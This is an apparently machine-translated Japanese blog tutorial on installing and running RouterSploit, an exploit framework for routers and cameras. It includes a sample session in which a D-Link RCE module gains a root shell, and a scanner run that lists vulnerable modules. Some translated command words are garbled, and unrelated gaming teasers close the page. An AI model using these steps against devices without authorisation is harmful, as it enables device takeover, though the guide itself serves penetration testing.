RouterSploit 組み込みデバイス用に特別に作成された驚くべきエクスプロイトフレームワークです.
ペンテスターはこのツールを使用して、カメラとルーターのセキュリティをスキャンできます.
目次
オプション:
以下のコマンドに従ってください:
apt-get install python3-pip
git clone https://www.github.com/threat9/routersploit
cd routersploit
python3 -m pip install -r requirements.txt
python3 rsf.py
Bluetooth LowEnergyのサポート:
apt-get install libglib2.0-dev
python3 -m pip install bluepy
python3 rsf.py
以下のコマンドに従ってください:
sudo add-apt-repository universe
sudo apt-get install git python3-pip
git clone https://www.github.com/threat9/routersploit
cd routersploit
python3 -m pip install setuptools
python3 -m pip install -r requirements.txt
python3 rsf.py
Bluetooth LowEnergyのサポート:
apt-get install libglib2.0-dev
python3 -m pip install bluepy
python3 rsf.py
以下のコマンドに従ってください:
git clone https://www.github.com/threat9/routersploit
cd routersploit
sudo python3 -m pip install -r requirements.txt
python3 rsf.py
以下のコマンドに従ってください:
git clone https://www.github.com/threat9/routersploit
cd routersploit
docker build -t routersploit .
docker run -it --rm routersploit
不便を避けるために、RouterSploitを頻繁に更新する必要があります.
新しいモジュールはほぼ毎日出荷されます.
cd routersploit
git pull
root @ kalidev:~/git/routersploit# ./rsf.py ______ _ _____ _ _ _ | ___ \ | | / ___| | | (_) | | |_ / / ___ _ _| |_ ___ _ __ `-. _ __ | | ___ _| |_ | // _ \| | | | __ / _ \ '__|`-. \ '_ \| |/ _ \| | __| | |\ \ (_) | |_| | || __ / | /\__ / / |_) | | (_) | | |_ \_| \_ ___ / __,_|\__ ___|_| \____ /| .__ /|_|\___ /|_|\__| | | のエクスプロイトフレームワーク |_| by Threat9 Embedded Devices Codename : I Knew You Were Trouble Version : 3.3.0 ホームページ : https://www.threat9.com/ - @threatnine Join Slack : routersploit.slack.com Join Threat9 Beta Program - https://www.threat9.com/ Exploits: 128 スキャナー: 4 信条: 165 ジェネリック: 4 ペイロード: 32 エンコーダー: 6 rsf >
搾取を実行するには, モジュールを選択してターゲットを設定するだけです:
rsf > use exploits/ exploits/2wire/ exploits/asmax/ exploits/asus/ exploits/cisco/ exploits/dlink/ exploits/fortinet/ exploits/juniper/ exploits/linksys/ exploits/multi/ exploits/netgear/ rsf > use exploits/dlink/dir_300_600_rce rsf (D-LINK DIR-300 & DIR-600 RCE) >
完了するには、Tabキーを使用します.
オプションを表示するには, タイプ show
:
rsf (D-LINK DIR-300 & DIR-600 RCE) > show options
Target options:
名前現在の設定説明
---- ---------------- -----------
ターゲットターゲットアドレス例:. http://192.168.1.1
ポート 80 ターゲットポート
使用する run
または exploit
ターゲットを悪用するコマンド:
rsf (D-LINK DIR-300 & DIR-600 RCE) > 走る
[+] ターゲットは脆弱です
[*] コマンドループの呼び出し。.
cmd > whoami
root
オプションを設定するには:
rsf (D-LINK DIR-300 & DIR-600 RCE) > ターゲットhttpを設定します://192.168.1.1 [+] {'目標': 'http://192.168.1.1'}
ターゲットが特定のエクスプロイトに対して脆弱かどうかを確認することができます:
rsf (D-LINK DIR-300 & DIR-600 RCE) > 小切手 [+] ターゲットは脆弱です
実行 show info
エクスプロイトに関する情報を表示するには.
スキャナーを使用すると、ターゲットがエクスプロイトに対して脆弱かどうかをすばやく確認できます.
同じコマンドを使用して、オプションを表示/設定します, そしてまた実行する.
rsf (D-Linkスキャナー) > 走る [+] エクスプロイト/ dlink / dwr_932_info_disclosureは脆弱です [-] エクスプロイト/ dlink / dir_300_320_615_auth_bypassは脆弱ではありません [-] エクスプロイト/ dlink / dsl_2750b_info_disclosureは脆弱ではありません [-] エクスプロイト/ dlink / dns_320l_327l_rceは脆弱ではありません [-] エクスプロイト/ dlink / dir_645_password_disclosureは脆弱ではありません [-] エクスプロイト/ dlink / dir_300_600_615_info_disclosureは脆弱ではありません [-] エクスプロイト/ dlink / dir_300_600_rceは脆弱ではありません [+] デバイスは脆弱です! - エクスプロイト/ dlink / dwr_932_info_disclosure
また読む: 1337xプロキシ
RouterSploit 使用する素晴らしいツールです.
に関する問題に直面した場合 RouterSploit. 以下にコメントしてください. 私たちのチームCSHAWKはできるだけ早くあなたと連絡を取ります.
今日のペースの速いデジタル世界ではオンライン ゲームが最新の常態となっています. The internet now offers…
As we enter in the final months of 2023, we can talk more clearly about…
に発売されて以来、 2011, Minecraft has become one of the most played video games…
Minecraft は 10 年以上にわたって活動を続けています, and in that time it has…
This website uses cookies.